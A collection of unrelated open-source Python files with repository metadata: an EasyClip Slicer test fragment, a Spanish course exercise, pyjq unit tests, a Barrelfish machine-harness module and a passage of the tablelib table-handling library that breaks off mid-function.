print(matYellow)
yellowslice.SetWidgetVisible(True)
matGreen = greenslice.GetSliceToRAS()
matGreen.SetElement(0,3,0)
matGreen.SetElement(1,3,-9)
matGreen.SetElement(2,3,0)
print(matGreen)
greenslice.SetWidgetVisible(True)
self.delayDisplay('planes are placed!')
logic = EasyClipLogic(slicer.modules.EasyClipWidget)
logic.getCoord()
logic.clipping()
self.delayDisplay('Test passed!')
| {
"content_hash": "b12ea5210c6aebdb77fcc6d44e4d80c6",
"timestamp": "",
"source": "github",
"line_count": 651,
"max_line_length": 149,
"avg_line_length": 51.3778801843318,
"alnum_prop": 0.570185666875953,
"repo_name": "DCBIA-OrthoLab/EasyClip-Extension",
"id": "6f362532a78c55736584dae2637a806cc2acff5c",
"size": "33447",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "EasyClip/EasyClip.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "2369"
},
{
"name": "Python",
"bytes": "33447"
}
],
"symlink_target": ""
} |
"""
Created on Mon Jul 17 16:17:25 2017
@author: jorgemauricio
- Definir una clase llamada Circulo que pueda ser construida por el radio.
La clase Circulo debe de contener un método que pueda calcular el área
"""
class Circulo:
def __init__(self, r):
self.radius = r
def calcularArea(self):
return self.radius**2*3.1416
| {
"content_hash": "f8e671461c29302a3d53668c4e648e8c",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 75,
"avg_line_length": 23.533333333333335,
"alnum_prop": 0.6798866855524079,
"repo_name": "jorgemauricio/INIFAP_Course",
"id": "83cd0d35f911980045ce8ca504adc0eeb68e1fa5",
"size": "402",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Exams/Respuestas/ejercicio_14_r.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "11052861"
},
{
"name": "Python",
"bytes": "59081"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import io
import os.path
import re
import shutil
import tempfile
import unittest
from datetime import datetime
from unittest.mock import patch
import pytest
import _pyjq
import pyjq
def test_compile_dot():
s = pyjq.compile(".")
assert isinstance(s, _pyjq.Script)
def test_syntax_error():
with pytest.raises(ValueError, match=r"error: syntax error"):
pyjq.compile("**")
def test_non_json_data():
with pytest.raises(
TypeError,
match=re.escape("<class 'datetime.datetime'> could not be converted to json"),
):
pyjq.all(".", {"date": datetime.now()})
def test_conversion_between_python_object_and_jv():
objects = [
None,
False,
True,
1,
1.5,
"string",
[None, False, True, 1, 1.5, [None, False, True], {"foo": "bar"}],
{
"key1": None,
"key2": False,
"key3": True,
"key4": 1,
"key5": 1.5,
"key6": [None, False, True, 1, 1.5, [None, False, True], {"foo": "bar"}],
},
]
s = pyjq.compile(".")
for obj in objects:
assert [obj] == s.all(obj)
def test_assigning_values():
assert pyjq.one("$foo", {}, vars=dict(foo="bar")) == "bar"
assert pyjq.one("$foo", {}, vars=dict(foo=["bar"])) == ["bar"]
def test_all():
assert pyjq.all(".[] | . + $foo", ["val1", "val2"], vars=dict(foo="bar")) == [
"val1bar",
"val2bar",
]
assert pyjq.all(". + $foo", "val", vars=dict(foo="bar")) == ["valbar"]
def test_first():
assert (
pyjq.first(".[] | . + $foo", ["val1", "val2"], vars=dict(foo="bar"))
== "val1bar"
)
def test_one():
assert pyjq.one(". + $foo", "val", vars=dict(foo="bar")) == "valbar"
# if got multiple elements
with pytest.raises(IndexError):
pyjq.one(".[]", [1, 2])
# if got no elements
with pytest.raises(IndexError):
pyjq.one(".[]", [])
def test_url_argument():
class FakeResponse:
def getheader(self, name):
return "application/json;charset=SHIFT_JIS"
def read(self):
return '["Hello", "世界", "!"]'.encode("shift-jis")
with patch("urllib.request.urlopen", return_value=FakeResponse()):
assert pyjq.all(".[] | . + .", url="http://example.com") == [
"HelloHello",
"世界世界",
"!!",
]
def opener(url):
return [1, 2, 3]
assert pyjq.all(".[] | . + .", url="http://example.com", opener=opener) == [2, 4, 6]
def test_library_path(tmp_path_factory):
library_path = tmp_path_factory.mktemp("a")
library_path2 = tmp_path_factory.mktemp("b")
library_file = library_path / "greeting.jq"
library_file2 = library_path2 / "increment.jq"
with library_file.open("w", encoding="ascii") as f:
f.write('def hello: "HELLO";')
f.write('def world: "WORLD";')
with library_file2.open("w", encoding="ascii") as f:
f.write("def increment: . + 1;\n")
values = pyjq.all(
'include "greeting"; include "increment"; .[] | [. | increment, hello, world]',
[1, 2, 3],
library_paths=[
str(library_path),
library_path2,
], # It accepts both of str and pathlib.Path
)
assert [
[2, "HELLO", "WORLD"],
[3, "HELLO", "WORLD"],
[4, "HELLO", "WORLD"],
] == values
def test_script_runtime_error_exported():
pyjq.ScriptRuntimeError # exported
| {
"content_hash": "5286ea04b05f12d4b92100ec943b6c88",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 88,
"avg_line_length": 25.092198581560282,
"alnum_prop": 0.5356133408705483,
"repo_name": "doloopwhile/pyjq",
"id": "bacc0f4bbccdae2a8c71e24d9139450ec16f1efc",
"size": "3573",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test_pyjq.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Cython",
"bytes": "6654"
},
{
"name": "Python",
"bytes": "9368"
}
],
"symlink_target": ""
} |
import os, getpass, subprocess, socket, pty
import debug, eth_machinedata
from machines import Machine, MachineLockedError, MachineFactory,\
MachineOperations
from subprocess_timeout import wait_or_terminate
TFTP_PATH='/home/netos/tftpboot'
TOOLS_PATH='/home/netos/tools/bin'
RACKBOOT=os.path.join(TOOLS_PATH, 'rackboot.sh')
RACKPOWER=os.path.join(TOOLS_PATH, 'rackpower')
class ETHBaseMachine(Machine):
_machines = None
def __init__(self, options,
operations,
serial_binary='serial_pc16550d',
**kwargs):
super(ETHBaseMachine, self).__init__(options, operations,
serial_binary=serial_binary,
**kwargs)
def get_perfcount_type(self):
return self._perfcount_type
class ETHBaseMachineOperations(MachineOperations):
def __init__(self, machine):
super(ETHBaseMachineOperations, self).__init__(machine)
self.lockprocess = None
self.masterfd = None
def _get_console_status(self):
raise NotImplementedError
def lock(self):
"""Use conserver to lock the machine."""
# find out current status of console
cstate = self._get_console_status()
# check that nobody else has it open for writing
myuser = getpass.getuser()
parts = cstate.strip().split(':')
conname, child, contype, details, users, state = parts[:6]
if users:
for userinfo in users.split(','):
mode, username, host, port = userinfo.split('@')[:4]
if 'w' in mode and username != myuser:
raise MachineLockedError # Machine is not free
# run a console in the background to 'hold' the lock and read output
debug.verbose('starting "console %s"' % self._machine.get_machine_name())
# run on a PTY to work around terminal mangling code in console
(self.masterfd, slavefd) = pty.openpty()
self.lockprocess = subprocess.Popen(["console", self._machine.get_machine_name()],
close_fds=True,
stdout=slavefd, stdin=slavefd)
os.close(slavefd)
# XXX: open in binary mode with no buffering
# otherwise select.select() may block when there is data in the buffer
self.console_out = os.fdopen(self.masterfd, 'rb', 0)
def unlock(self):
if self.lockprocess is None:
return # noop
debug.verbose('quitting console process (%d)' % self.lockprocess.pid)
# os.kill(self.lockprocess.pid, signal.SIGTERM)
os.write(self.masterfd, "\x05c.")
wait_or_terminate(self.lockprocess)
self.lockprocess = None
self.masterfd = None
# this expects a pexpect object for `consolectrl`
def force_write(self, consolectrl):
try:
consolectrl.send('\x05cf')
except:
print "Unable to force write control through consolectrl, trying masterfd"
os.write(self.masterfd, "\x05cf")
def get_output(self):
return self.console_out
class ETHMachine(ETHBaseMachine):
_machines = eth_machinedata.machines
def __init__(self, options, **kwargs):
super(ETHMachine, self).__init__(options, ETHMachineOperations(self), **kwargs)
def get_buildall_target(self):
if 'buildall_target' in self._machines[self.name]:
return self._machines[self.name]['buildall_target']
return self.get_bootarch().upper() + "_Full"
def get_xphi_ncores(self):
if 'xphi_ncores' in self._machines[self.name] :
return self._machines[self.name]['xphi_ncores']
else :
return 0
def get_xphi_ncards(self):
if 'xphi_ncards' in self._machines[self.name] :
return self._machines[self.name]['xphi_ncards']
else :
return 0
def get_xphi_ram_gb(self):
if 'xphi_ram_gb' in self._machines[self.name] :
return self._machines[self.name]['xphi_ram_gb']
else :
return 0
def get_xphi_tickrate(self):
if 'xphi_tickrate' in self._machines[self.name] :
return self._machines[self.name]['xphi_tickrate']
else :
return 0
def get_hostname(self):
return self.get_machine_name() + '.in.barrelfish.org'
def get_ip(self):
return socket.gethostbyname(self.get_hostname())
class ETHMachineOperations(ETHBaseMachineOperations):
def __init__(self, machine):
super(ETHMachineOperations, self).__init__(machine)
def get_tftp_dir(self):
user = getpass.getuser()
return os.path.join(TFTP_PATH, user, self._machine.name + "_harness")
def get_tftp_subdir(self):
user = getpass.getuser()
return os.path.join(user, self._machine.name + "_harness")
def _write_menu_lst(self, data, path):
debug.verbose('writing %s' % path)
debug.debug(data)
with open(path, 'w') as f:
f.write(data)
def _get_menu_lst_name(self):
if self._machine.get_bootarch() == "armv8":
return "hagfish.cfg"
else:
return "menu.lst"
def _set_menu_lst(self, relpath):
ip_menu_name = os.path.join(TFTP_PATH, self._get_menu_lst_name() + "." + self._machine.get_ip())
debug.verbose('relinking %s to %s' % (ip_menu_name, relpath))
os.remove(ip_menu_name)
os.symlink(relpath, ip_menu_name)
def set_bootmodules(self, modules):
fullpath = os.path.join(self.get_tftp_dir(), self._get_menu_lst_name())
relpath = os.path.relpath(fullpath, TFTP_PATH)
tftppath = '/' + os.path.relpath(self.get_tftp_dir(), TFTP_PATH)
self._write_menu_lst(modules.get_menu_data(tftppath), fullpath)
self._set_menu_lst(relpath)
def _get_console_status(self):
debug.verbose('executing "console -i %s" to check state' %
self._machine.get_machine_name())
proc = subprocess.Popen(["console", "-i", self._machine.get_machine_name()],
stdout=subprocess.PIPE)
line = proc.communicate()[0]
assert(proc.returncode == 0)
return line
def __rackboot(self, args):
debug.checkcmd([RACKBOOT] + args + [self._machine.get_machine_name()])
def setup(self):
if self._machine.get_bootarch() == "armv8":
self.__rackboot(["-b", "-H", "-n"])
else:
self.__rackboot(["-b", "-n"])
def __rackpower(self, arg):
try:
debug.checkcmd([RACKPOWER, arg, self._machine.get_machine_name()])
except subprocess.CalledProcessError:
debug.warning("rackpower %s %s failed" %
(arg, self._machine.get_machine_name()))
def reboot(self):
self.__rackpower('-r')
def shutdown(self):
self.__rackpower('-d')
for n in sorted(ETHMachine._machines.keys()):
class TmpMachine(ETHMachine):
name = n
MachineFactory.addMachine(n, TmpMachine, **ETHMachine._machines[n])
| {
"content_hash": "750ba27e5258b7162032720d251299bc",
"timestamp": "",
"source": "github",
"line_count": 202,
"max_line_length": 104,
"avg_line_length": 35.539603960396036,
"alnum_prop": 0.5915865719459534,
"repo_name": "kishoredbn/barrelfish",
"id": "f93b9c9bbd501f2c8b86edeb1d5c9be63d62d4b3",
"size": "7610",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/harness/machines/eth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "2589287"
},
{
"name": "Awk",
"bytes": "9178"
},
{
"name": "Batchfile",
"bytes": "49856"
},
{
"name": "C",
"bytes": "77396109"
},
{
"name": "C++",
"bytes": "14632842"
},
{
"name": "CMake",
"bytes": "5175"
},
{
"name": "CSS",
"bytes": "1905"
},
{
"name": "DIGITAL Command Language",
"bytes": "278456"
},
{
"name": "Emacs Lisp",
"bytes": "23337"
},
{
"name": "Gnuplot",
"bytes": "3383"
},
{
"name": "Groff",
"bytes": "407423"
},
{
"name": "HTML",
"bytes": "377310"
},
{
"name": "Haskell",
"bytes": "147463"
},
{
"name": "Lex",
"bytes": "2872"
},
{
"name": "Logos",
"bytes": "31891"
},
{
"name": "Makefile",
"bytes": "850866"
},
{
"name": "Objective-C",
"bytes": "43119"
},
{
"name": "Perl",
"bytes": "2688059"
},
{
"name": "Perl6",
"bytes": "255974"
},
{
"name": "Prolog",
"bytes": "2571678"
},
{
"name": "Protocol Buffer",
"bytes": "2764"
},
{
"name": "Scheme",
"bytes": "4249"
},
{
"name": "Scilab",
"bytes": "5315"
},
{
"name": "Shell",
"bytes": "719683"
},
{
"name": "SuperCollider",
"bytes": "8638"
},
{
"name": "Tcl",
"bytes": "18714"
},
{
"name": "TeX",
"bytes": "411611"
},
{
"name": "XS",
"bytes": "4319"
},
{
"name": "XSLT",
"bytes": "1792"
},
{
"name": "Yacc",
"bytes": "11190"
},
{
"name": "eC",
"bytes": "5079"
}
],
"symlink_target": ""
} |
"""
tablelib.py
Parse, format, and manipulate tabular data.
--Example----------------------------------------------------
##types:string int
name num
mike 23
alex 12
matt 7
-------------------------------------------------------------
File is tab delimited.
Directives are on a single line and begin with two hashes '##'
No space after colon is allowed.
Table can also handle custom types. Custom types must do the following
1. default value:
default = mytype()
returns default value
2. convert from string
val = mytype(string)
converts from string to custom type
3. convert to string
string = str(val)
converts val of type 'mytype' to a string
4. type inference (optional)
type(val)
returns instance of 'mytype'
TODO: I could not require this (only map() really needs it and __init__())
"""
# python libs
import copy
from itertools import chain, imap, izip
import os
from sqlite3 import dbapi2 as sqlite
from StringIO import StringIO
import sys
# rasmus libs
from rasmus import util
# table directives
DIR_TYPES = 1
# a special unique null type (more 'null' than None)
NULL = object()
class TableException (Exception):
"""Exception class for Table"""
def __init__(self, errmsg, filename=None, lineno=None):
msg = ""
add_space = False
add_colon = False
if filename:
msg += "%s" % filename
add_space = True
add_colon = True
if lineno:
add_colon = True
if add_space:
msg += " "
msg += "line %d" % lineno
if add_colon:
msg += ": "
msg = msg + errmsg
Exception.__init__(self, msg)
#===========================================================================
# Types handling
def guess_type(text):
"""Guess the type of a value encoded in a string."""
try:
int(text)
return int
except:
pass
try:
float(text)
return float
except ValueError:
pass
try:
str2bool(text)
return bool
except ValueError:
pass
return str
def str2bool(text=None):
"""Parse a boolean stored as a string."""
if text is None:
# default value
return False
text = text.lower()
if text == "false":
return False
elif text == "true":
return True
else:
raise ValueError("unknown string for bool '%s'" % text)
_type_definitions = [
["string", str],
["unknown", str], # backwards compatiable name
["str", str], # backwards compatiable name
["string", unicode],
["int", int],
["int", long],
["float", float],
["bool", bool],
]
# NOTE: ordering of name-type pairs is important
# the first occurrence of a type gives the perferred name for writing
def parse_type(type_name):
"""Parse a type name into a type."""
for name, type_object in _type_definitions:
if type_name == name:
return type_object
raise Exception("unknown type '%s'" % type_name)
def format_type(type_object):
"""Format a type into a type name."""
for name, type_object2 in _type_definitions:
if type_object == type_object2:
return name
raise Exception("unknown type '%s'" % type_object)
#===========================================================================
# Table class
class Table (list):
"""A table of data"""
def __init__(self, rows=None,
headers=None,
types={},
filename=None,
nheaders=1):
# set table info
self.headers = copy.copy(headers)
self.types = copy.copy(types)
self.comments = []
self.delim = "\t"
self.nheaders = nheaders
self.filename = filename
# set data
if rows:
self._set_data(rows)
def _set_data(self, rows=[]):
"""Set the table data from an iterable."""
try:
# use first row to guess data style
rows = iter(rows)
first_row = rows.next()
except StopIteration:
# No data given
return
if isinstance(first_row, dict):
# data is a list of dicts
# set default headers based on first row keys
if self.headers is None:
self.headers = sorted(first_row.keys())
# add data
self.extend(imap(dict, chain([first_row], rows)))
elif isinstance(first_row, (list, tuple)):
# data is a list of lists
# use first row to determine headers
if self.nheaders == 0:
if self.headers is None:
self.headers = range(len(first_row))
rows = chain([first_row], rows)
else:
if self.headers is None:
self.headers = list(first_row)
# add data
self.extend(dict(zip(self.headers, row)) for row in chain([first_row], rows))
# guess any types not specified
if len(self) > 0:
for key in self.headers:
row = self[0]
if key not in self.types:
self.types[key] = type(row[key])
def clear(self, headers=None, delim="\t", nheaders=1, types=None):
"""Clear the contents of the table."""
# clear table info
self.headers = copy.copy(headers)
if types is None:
self.types = {}
else:
self.types = copy.copy(types)
self.comments = []
self.delim = delim
self.nheaders = nheaders
# clear data
self[:] = []
def new(self, headers=None):
"""
Return a new table with the same info but no data.
headers: if specified, only a subset of the headers will be copied.
"""
if headers is None:
headers = self.headers
tab = type(self)(headers=headers)
tab.types = util.subdict(self.types, headers)
tab.comments = copy.copy(self.comments)
tab.delim = self.delim
tab.nheaders = self.nheaders
return tab
#===================================================================
# Input/Output
def read(self, filename, delim="\t", nheaders=1,
headers=None, types=None, guess_types=True):
self.extend(self.read_iter(
filename, delim=delim, nheaders=nheaders,
headers=headers, types=types,
guess_types=guess_types))
return self
def read_iter(self, filename, delim="\t", nheaders=1,
headers=None, types=None, guess_types=True):
"""
Reads a character delimited file and yields a dict for each row.
Blank lines are skipped. Lines that start with a single '#'
are treated as comments. Lines starting with '##' are treated as
directives.
"""
infile = util.open_stream(filename)
# remember filename for later saving
if isinstance(filename, str):
self.filename = filename
# clear table
self.clear(headers, delim, nheaders, types)
# temps for reading only
self._tmptypes = None
first_row = True
# line number for error reporting
lineno = 0
try:
for line in infile:
line = line.rstrip('\n')
lineno += 1
# skip blank lines
if len(line) == 0:
continue
# handle comments
if line[0] == "#":
if not self._read_directive(line):
self.comments.append(line)
continue
# split row into tokens
tokens = line.split(delim)
# if no headers read yet, use this line as a header
if not self.headers:
# parse headers
if self.nheaders > 0:
self._parse_header(tokens)
continue
else:
# default headers are numbers
self.headers = range(len(tokens))
assert len(tokens) == len(self.headers), tokens
# populate types
if first_row:
first_row = False
if self._tmptypes:
# use explicit types
assert len(self._tmptypes) == len(self.headers)
self.types = dict(zip(self.headers, self._tmptypes))
else:
# default types
if guess_types:
for token, header in zip(tokens, self.headers):
self.types.setdefault(header,
guess_type(token))
else:
for header in self.headers:
self.types.setdefault(header, str)
# parse data
row = {}
for header, token in izip(self.headers, tokens):
type_object = self.types[header]
if type_object is bool:
type_object = str2bool
row[header] = type_object(token)
# yield completed row
yield row
except Exception, e:
# report error in parsing input file
raise TableException(str(e), self.filename, lineno)
# clear temps
del self._tmptypes
def _parse_header(self, tokens):
"""Parse the tokens as headers"""
self.headers = tokens
# check that headers are unique
check = set()
for header in self.headers:
if header in check:
raise TableException("Duplicate header '%s'" % header)
check.add(header)
def write(self, filename=sys.stdout, delim="\t", comments=False,
nheaders=None):
"""Write a table to a file or stream.
If 'filename' is a string it will be opened as a file.
If 'filename' is a stream it will be written to directly.
"""
# remember filename for later saving
if isinstance(filename, str):
self.filename = filename
out = util.open_stream(filename, "w")
self.write_header(out, delim=delim, comments=comments,
nheaders=(nheaders if nheaders is not None
else self.nheaders))
# tmp variable
types = self.types
# write data
for row in self:
# code is inlined here for speed
rowstr = []
for header in self.headers:
if header in row:
rowstr.append(types[header].__str__(row[header]))
else:
rowstr.append('')
out.write(delim.join(rowstr))
out.write('\n')
def write_header(self, out=sys.stdout, delim="\t", comments=False,
nheaders=None):
# ensure all info is complete.
# introspect types or use str by default.
for key in self.headers:
if key not in self.types:
if len(self) > 0:
self.types[key] = type(self[0][key])
else:
self.types[key] = str
# ensure types are in directives
if DIR_TYPES not in self.comments:
self.comments.insert(0, DIR_TYPES)
# write comments
if comments:
for line in self.comments:
if isinstance(line, str):
out.write(line)
out.write('\n')
else:
self._write_directive(line, out, delim)
# write header
if nheaders > 0:
out.write(delim.join(self.headers))
out.write('\n')
def write_row(self, out, row, delim="\t"):
rowstr = []
types = self.types
for header in self.headers:
if header in row:
rowstr.append(types[header].__str__(row[header]))
else:
rowstr.append('')
out.write(delim.join(rowstr))
out.write("\n")
def save(self):
"""
Writes the table to the last used filename.
"""
if self.filename is not None:
self.write(self.filename)
else:
raise Exception("Table has no filename")
#===================================================================
# Input/Output: Directives
def _determine_directive(self, line):
if line.startswith("##types:"):
return DIR_TYPES
else:
return None
def _read_directive(self, line):
"""Attempt to read a line with a directive"""
directive = self._determine_directive(line)
if directive is None:
return False
rest = line[line.index(":")+1:]
self.comments.append(directive)
if directive == DIR_TYPES:
self._tmptypes = map(
parse_type, rest.rstrip('\n').split(self.delim))
return True
else:
return False
def _write_directive(self, line, out, delim):
"""Write a directive"""
if line == DIR_TYPES:
out.write("##types:" + delim.join(format_type(self.types[h])
for h in self.headers) + "\n")
else:
raise "unknown directive:", line
#===================================================================
# Table manipulation
def add(self, **kargs):
"""Add a row to the table
tab.add(col1=val1, col2=val2, col3=val3)
"""
self.append(kargs)
def add_col(self, header, coltype=None, default=NULL, pos=None, data=None):
"""Add a column to the table. You must populate column data yourself.
header - name of the column
coltype - type of the values in that column
default - default value of the column
pos - position to insert column (default: right-end)
"""
# ensure header is unique
if header in self.headers:
raise Exception("header '%s' is already in table" % header)
# default column position is last column
if pos is None:
pos = len(self.headers)
# default coltype is guessed from data
if coltype is None:
if data is None:
raise Exception("must specify data or coltype")
else:
coltype = type(data[0])
# default value is inferred from column type
if default is NULL:
default = coltype()
# update table info
self.headers.insert(pos, header)
self.types[header] = coltype
# add data
if data is not None:
for i in xrange(len(self)):
self[i][header] = data[i]
def remove_col(self, *cols):
"""Removes a column from the table"""
for col in cols:
self.headers.remove(col)
del self.types[col]
for row in self:
del row[col]
def rename_col(self, oldname, newname):
"""Renames a column"""
# change header
col = self.headers.index(oldname)
if col == -1:
raise Exception("column '%s' is not in table" % oldname)
self.headers[col] = newname
# change info
self.types[newname] = self.types[oldname]
del self.types[oldname]
# change data
for row in self:
row[newname] = row[oldname]
del row[oldname]
def get_matrix(self, rowheader="rlabels"):
"""Returns mat, rlabels, clabels
where mat is a copy of the table as a 2D list
rlabels are the row labels
clabels are the column labels
"""
# get labels
if rowheader is not None and rowheader in self.headers:
rlabels = self.cget(rowheader)
clabels = copy.copy(self.headers)
clabels.remove(rowheader)
else:
rlabels = range(len(self))
clabels = copy.copy(self.headers)
# get data
mat = []
for row in self:
mat.append(util.mget(row, clabels))
return mat, rlabels, clabels
def as_lists(self, cols=None):
"""Iterate over rows as lists"""
if cols is None:
cols = self.headers
for row in self:
yield [row[header] for header in cols]
def as_tuples(self, cols=None):
"""Iterate over rows as lists"""
if cols is None:
cols = self.headers
for row in self:
yield tuple(row[header] for header in cols)
def filter(self, cond):
"""Returns a table with a subset of rows such that cond(row) == True"""
tab = self.new()
for row in self:
if cond(row):
tab.append(row)
return tab
def map(self, func, headers=None):
"""Returns a new table with each row mapped by function 'func'"""
if len(self) == 0:
# handle case of zero length table
return self.new()
# determine what table will look like from first row
first_row = func(self[0])
# determine headers of new table
if headers is None:
# try order new headers the same way as old headers
headers = first_row.keys()
lookup = util.list2lookup(self.headers)
top = len(headers)
headers.sort(key=lambda x: (lookup.get(x, top), x))
tab = type(self)(
chain([first_row], (func(x) for x in self[1:])),
headers=headers)
tab.delim = self.delim
tab.nheaders = self.nheaders
return tab
def uniq(self, key=None, col=None):
"""
Returns a copy of this table with consecutive repeated rows removed
"""
tab = self.new()
if len(self) == 0:
return tab
if col is not None:
key = lambda x: x[col]
if key is None:
last_row = self[0]
for row in self[1:]:
if row != last_row:
tab.append(row)
last_row = row
else:
last_row = key(self[0])
for row in self[1:]:
key_row = key(row)
if key_row != last_row:
tab.append(row)
last_row = key_row
return tab
def groupby(self, key=None):
"""Groups the row of the table into separate tables based on the
function key(row). Returns a dict where the keys are the values
retruned from key(row) and the values are tables.
Ex:
tab = Table([{'name': 'matt', 'major': 'CS'},
{'name': 'mike', 'major': 'CS'},
{'name': 'alex', 'major': 'bio'}])
lookup = tab.groupby(lambda x: x['major'])
lookup ==> {'CS': Table([{'name': 'matt', 'major': 'CS'},
{'name': 'mike', 'major': 'CS'}]),
'bio': Table([{'name': 'alex', 'major': 'bio'}])}
Can also use a column name such as:
tab.groupby('major')
"""
groups = {}
if isinstance(key, str):
keystr = key
key = lambda x: x[keystr]
if key is None:
raise Exception("must specify keyfunc")
for row in self:
key2 = key(row)
# add new table if necessary
if key2 not in groups:
groups[key2] = self.new()
groups[key2].append(row)
return groups
def lookup(self, *keys, **options):
"""Returns a lookup dict based on a column 'key'
or multiple keys
extra options:
default=None
uselast=False # allow multiple rows, just use last
"""
options.setdefault("default", None)
options.setdefault("uselast", False)
lookup = util.Dict(dim=len(keys), default=options["default"])
uselast = options["uselast"]
for row in self:
keys2 = util.mget(row, keys)
ptr = lookup
for i in xrange(len(keys2) - 1):
ptr = lookup[keys2[i]]
if not uselast and keys2[-1] in ptr:
raise Exception("duplicate key '%s'" % str(keys2[-1]))
ptr[keys2[-1]] = row
lookup.insert = False
return lookup
def get(self, rows=None, cols=None):
"""Returns a table with a subset of the rows and columns"""
# determine rows and cols
if rows is None:
rows = range(len(self))
if cols is None:
cols = self.headers
tab = self.new(cols)
# copy data
for i in rows:
row = self[i]
row2 = {}
for j in cols:
row2[j] = row[j]
tab.append(row2)
return tab
def cget(self, *cols):
"""Returns columns of the table as separate lists"""
ret = []
for col in cols:
newcol = []
ret.append(newcol)
for row in self:
newcol.append(row[col])
if len(ret) == 1:
return ret[0]
else:
return ret
def get_row(self, *rows):
"""Returns row(s) as list(s)"""
if len(rows) == 1:
# return one row
row = self[rows[0]]
return [row[j] for j in self.headers]
else:
# return multiple rows (or zero)
return [[self[i][j] for j in self.headers]
for i in rows]
def sort(self, cmp=None, key=None, reverse=False, col=None):
"""Sorts the table inplace"""
if col is not None:
key = lambda row: row[col]
elif cmp is None and key is None:
# sort by first column
key = lambda row: row[self.headers[0]]
list.sort(self, cmp=cmp, key=key, reverse=reverse)
def __getitem__(self, key):
if isinstance(key, slice):
# return another table if key is a slice
tab = self.new()
tab[:] = list.__getitem__(self, key)
return tab
else:
return list.__getitem__(self, key)
def __getslice__(self, a, b):
# for python version compatibility
return self.__getitem__(slice(a, b))
def __repr__(self):
s = StringIO()
self.write_pretty(s)
return s.getvalue()
def write_pretty(self, out=sys.stdout, spacing=2):
mat2, rlabels, clabels = self.get_matrix(rowheader=None)
mat = []
# get headers
mat.append(clabels)
# get data
mat.extend(mat2)
util.printcols(mat, spacing=spacing, out=out)
def __str__(self):
s = StringIO()
self.write(s)
return s.getvalue()
#===========================================================================
# Convenience functions
def read_table(filename, delim="\t", headers=None,
nheaders=1, types=None,
guess_types=True):
"""Read a Table from a file written in PTF"""
table = Table()
table.read(filename, delim=delim, headers=headers,
nheaders=nheaders, types=types,
guess_types=guess_types)
return table
def iter_table(filename, delim="\t", nheaders=1, types=None, guess_types=True):
"""Iterate through the rows of a Table from a file."""
table = Table()
return table.read_iter(filename, delim=delim, nheaders=nheaders,
types=types, guess_types=guess_types)
def histtab(items, headers=None, item="item", count="count", percent="percent",
cols=None):
"""Make a histogram table."""
if cols is not None:
# items is a Table.
items = items.as_tuples(cols=cols)
if headers is None:
headers = cols + [count, percent]
if headers is None:
headers = [item, count, percent]
h = util.hist_dict(items)
tab = Table(headers=headers)
tot = float(sum(h.itervalues()))
hist_items = h.items()
if cols is not None:
for key, val in hist_items:
row = dict(zip(cols, key))
row[count] = val
tab.append(row)
else:
for key, val in hist_items:
tab.append({item: key,
count: val})
if percent is not None:
for i, (key, val) in enumerate(hist_items):
tab[i][percent] = val / tot
tab.sort(col=count, reverse=True)
return tab
def join_tables(*args, **kwargs):
"""Join together tables into one table.
Each argument is a tuple (table_i, key_i, cols_i)
key_i is either a column name or a function that maps a
table row to a unique key
"""
if len(args) == 0:
return Table()
# determine common keys
tab, key, cols = args[0]
if isinstance(key, str):
keys = tab.cget(key)
lookups = [tab.lookup(key)]
else:
keys = map(key, tab)
lookup = {}
for row in tab:
lookup[key(row)] = row
lookups = [lookup]
keyset = set(keys)
for tab, key, cols in args[1:]:
if isinstance(key, str):
keyset = keyset & set(tab.cget(key))
lookups.append(tab.lookup(key))
else:
keyset = keyset & set(map(key, tab))
lookup = {}
for row in tab:
lookup[key(row)] = row
lookups.append(lookup)
keys = filter(lambda x: x in keyset, keys)
# build new table
if "headers" not in kwargs:
headers = util.concat(*util.cget(args, 2))
else:
headers = kwargs["headers"]
tab = Table(headers=headers)
for key in keys:
row = {}
for (tab2, key2, cols), lookup in zip(args, lookups):
row.update(util.subdict(lookup[key], cols))
tab.append(row)
return tab
def showtab(tab, name='table'):
"""Show a table in a new xterm"""
name = name.replace("'", "")
tmp = util.tempfile(".", "tmp", ".tab")
tab.write_pretty(file(tmp, "w"))
os.system("(xterm -T '%s' -n '%s' -e less -S %s; rm %s) &" %
(name, name, tmp, tmp))
def sqlget(dbfile, query, maxrows=None, headers=None, headernum=False):
"""Get a table from a sqlite file"""
# open database
if hasattr(dbfile, "cursor"):
con = dbfile
cur = con.cursor()
auto_close = False
else:
con = sqlite.connect(dbfile, isolation_level="DEFERRED")
cur = con.cursor()
auto_close = True
cur.execute(query)
# infer header names
if headers is None and not headernum:
headers = [x[0] for x in cur.description]
if maxrows is not None:
lst = []
try:
for i in xrange(maxrows):
lst.append(cur.next())
except StopIteration:
pass
tab = Table(lst, headers=headers)
else:
tab = Table(list(cur), headers=headers)
if auto_close:
con.close()
return tab
def sqlexe(dbfile, sql):
# open database
if hasattr(dbfile, "cursor"):
con = dbfile
cur = con.cursor()
auto_close = False
else:
con = sqlite.connect(dbfile, isolation_level="DEFERRED")
cur = con.cursor()
auto_close = True
cur.execute(sql)
if auto_close:
con.close()
def sql_create_table(cur, table_name, tab, overwrite=True):
"""Create an SQL based on a tab"""
def issubclass2(t1, t2):
if type(t1) != type:
return False
return issubclass(t1, t2)
# drop old table if needed
if overwrite:
cur.execute("DROP TABLE IF EXISTS %s;" % table_name)
# build columns
cols = []
for header in tab.headers:
t = tab.types[header]
if issubclass2(t, basestring):
cols.append("%s TEXT" % header)
elif issubclass2(t, int):
cols.append("%s INTEGER" % header)
elif issubclass2(t, float):
cols.append("%s FLOAT" % header)
elif issubclass2(t, bool):
cols.append("%s BOOLEAN" % header)
else:
# default is text
cols.append("%s TEXT" % header)
cols = ",".join(cols)
# create table
cur.execute("""CREATE TABLE %s (%s);""" % (table_name, cols))
def sqlput(dbfile, table_name, tab, overwrite=True, create=True):
"""Insert a table into a sqlite file"""
# open database
if hasattr(dbfile, "cursor"):
con = dbfile
